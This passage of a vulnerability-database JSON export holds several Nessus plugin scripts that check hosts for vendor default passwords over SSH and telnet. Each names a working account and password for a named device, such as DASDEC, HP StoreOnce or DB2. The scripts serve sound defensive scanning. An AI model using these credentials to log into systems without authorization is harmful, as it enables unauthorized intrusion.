script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(255);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22, 8022);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:47:10", "description": "The account 'root' on the remote host has the password 'dasdec1'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-18T00:00:00", "type": "nessus", "title": "Default password (dasdec1) for 'root' account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2013-4735"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_DASDEC1.NASL", "href": "https://www.tenable.com/plugins/nessus/68959", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"dasdec1\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68959);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2013-4735\");\n script_bugtraq_id(60915);\n\n script_name(english:\"Default password (dasdec1) for 'root' account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'dasdec1'. An\nattacker may leverage this issue to gain access to the affected system\nand launch further attacks against it.\");\n # https://www.usatoday.com/story/news/nation/2013/02/13/police-believe-zombie-hoax-attacks-linked/1915921/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b933642f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the device's root password.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (!thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:56:21", "description": "The account 'emcupdate' on the remote EMC PowerPath virtual appliance has the default password 'password'. An attacker can leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-05-22T00:00:00", "type": "nessus", "title": "Default Password (password) for 'emcupdate' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2015-0529"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:emc:powerpath_virtual_appliance"], "id": "ACCOUNT_EMCUPDATE_PASSWORD.NASL", "href": "https://www.tenable.com/plugins/nessus/83783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"emcupdate\";\npassword = \"password\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83783);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2015-0529\");\n script_bugtraq_id(73482);\n\n script_name(english:\"Default Password (password) for 'emcupdate' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EMC PowerPath virtual appliance can be accessed with a\nbuilt-in account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'emcupdate' on the remote EMC PowerPath virtual appliance\nhas the default password 'password'. An attacker can leverage this\nissue to gain access to the affected system and launch further attacks\nagainst it.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/535155/30/270/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:powerpath_virtual_appliance\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, cmd:'pwd', cmd_regex:'^/home/emcupdate$', port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, cmd:'pwd', cmd_regex:'^/home/emcupdate$', port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:23:34", "description": "The account 'root' on the remote host has the password 'm'. \n\nAn attacker may leverage this issue to gain access to the affected system. \n\nNote that some Camtron IP cameras are reported to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-11-15T00:00:00", "type": "nessus", "title": "Default Password (m) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2010-4233"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_M.NASL", "href": "https://www.tenable.com/plugins/nessus/50601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"m\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50601);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2010-4233\");\n script_bugtraq_id(44841);\n\n script_name(english:\"Default Password (m) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'm'. \n\nAn attacker may leverage this issue to gain access to the affected\nsystem. \n\nNote that some Camtron IP cameras are reported to use these\ncredentials by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-006/?fid=3769&dl=1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2010/Nov/127\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either set a strong password for this account, disable it, or use\nACLs to restrict access to the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:39:21", "description": "The account 'HPSupport' on the remote host has the password 'badg3r5'. \n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that HP StoreOnce D2D Backup systems running software version 2.2.17 / 1.2.17 or older are known to have an account that uses these credentials.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-27T00:00:00", "type": "nessus", "title": "Default Password (badg3r5) for 'HPSupport' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2013-2342"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_HPSUPPORT_BADG3R5.NASL", "href": "https://www.tenable.com/plugins/nessus/67005", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"HPSupport\";\npassword = \"badg3r5\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67005);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2013-2342\");\n script_bugtraq_id(60819);\n\n script_name(english:\"Default Password (badg3r5) for 'HPSupport' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'HPSupport' on the remote host has the password 'badg3r5'. \n\nAn attacker may leverage this issue to gain administrative access to the\naffected system.\n\nNote that HP StoreOnce D2D Backup systems running software version\n2.2.17 / 1.2.17 or older are known to have an account that uses these\ncredentials.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lolware.net/2014/05/29/hpstorage.html\");\n # https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c03813919-1%257CdocLocale%253D%257CcalledBy%253D&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0eeaeffa\");\n script_set_attribute(attribute:\"solution\", value:\n\"If the device is an HP StoreOnce D2D Backup system, upgrade to software\nversion 2.2.18 / 1.2.18 or later. \n\nOtherwise, set a strong password for this account or use ACLs to\nrestrict access to the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2342\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:08:02", "description": "The account 'db2fenc1' has the password 'db2fenc1'. An attacker may use this to gain further privileges on the system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-10-01T00:00:00", "type": "nessus", "title": "Default Password (db2fenc1) for 'db2fenc1' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2001-0051"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DB2FENC1_DB2FENC1.NASL", "href": "https://www.tenable.com/plugins/nessus/11860", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Chris Foster\n#\n#\n# See the Nessus Scripts License for details\n#\n# Changes by Tenable\n# Add global_settings/supplied_logins_only script_exclude_key (06/2015)\n# Add exit() messages for more detailed audits\n#\n\naccount = \"db2fenc1\";\npassword = \"db2fenc1\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11860);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2001-0051\");\n script_bugtraq_id(2068);\n\n script_name(english:\"Default Password (db2fenc1) for 'db2fenc1' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'db2fenc1' has the password 'db2fenc1'. An attacker may\nuse this to gain further privileges on the system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/10/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Chris Foster.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) exit(0, \"Nessus is currently configured to not log in with user accounts not specified in the scan policy.\");\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:08:04", "description": "The account 'db2inst1' has the password 'ibmdb2'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-10-01T00:00:00", "type": "nessus", "title": "Default Password (ibmdb2) for 'db2inst1' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2001-0051"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DB2INST1_IBMDB2.NASL", "href": "https://www.tenable.com/plugins/nessus/11859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Chris Foster\n#\n#\n# See the Nessus Scripts License for details\n#\n# Changes by Tenable\n# Add global_settings/supplied_logins_only script_exclude_key (06/2015)\n# Add exit() messages for more detailed audits\n#\n\naccount = \"db2inst1\";\npassword = \"ibmdb2\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11859);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2001-0051\");\n script_bugtraq_id(2068);\n\n script_name(english:\"Default Password (ibmdb2) for 'db2inst1' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'db2inst1' has the password 'ibmdb2'. An attacker may\nuse this to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/10/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Chris Foster.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) exit(0, \"Nessus is currently configured to not log in with user accounts not specified in the scan policy.\");\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n\n", "cvss": {"score": 7.5, "vector": 